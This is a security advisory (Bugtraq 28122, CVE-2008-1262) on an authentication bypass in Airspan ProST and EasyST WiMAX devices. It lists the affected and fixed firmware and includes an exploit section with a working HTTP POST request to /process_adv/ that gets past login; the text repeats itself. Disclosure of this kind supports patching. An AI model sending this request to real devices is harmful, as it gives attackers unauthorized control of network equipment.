Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability
BID:28122
Info
Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability
| Bugtraq ID: | 28122 |
| Class: | Access Validation Error |
| CVE: |
CVE-2008-1262 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 06 2008 12:00AM |
| Updated: | Apr 16 2008 12:28AM |
| Credit: | Francis Lacoste-Cordeau <[email protected]> |
| Vulnerable: |
Airspan ProST-WiFi-2 0 Airspan ProST-WiFi 0 Airspan ProST-2 0 Airspan ProST Firmware 6.5.38 .0 Airspan ProST 0 Airspan EasyST-2 0 Airspan EasyST 0 |
| Not Vulnerable: |
Airspan ProST Firmware 6.5.41 .0 |
Discussion
Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability
Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface.
An attacker can exploit this issue to gain unauthorized access to the affected device and make arbitrary changes to its configuration. This may lead to further attacks.
Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface.
An attacker can exploit this issue to gain unauthorized access to the affected device and make arbitrary changes to its configuration. This may lead to further attacks.
Exploit / POC
Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability
An attacker can use a browser to exploit this issue.
The following HTTP POST example request demonstrates this issue:
POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DialogText=&Advanced=1
An attacker can use a browser to exploit this issue.
The following HTTP POST example request demonstrates this issue:
POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DialogText=&Advanced=1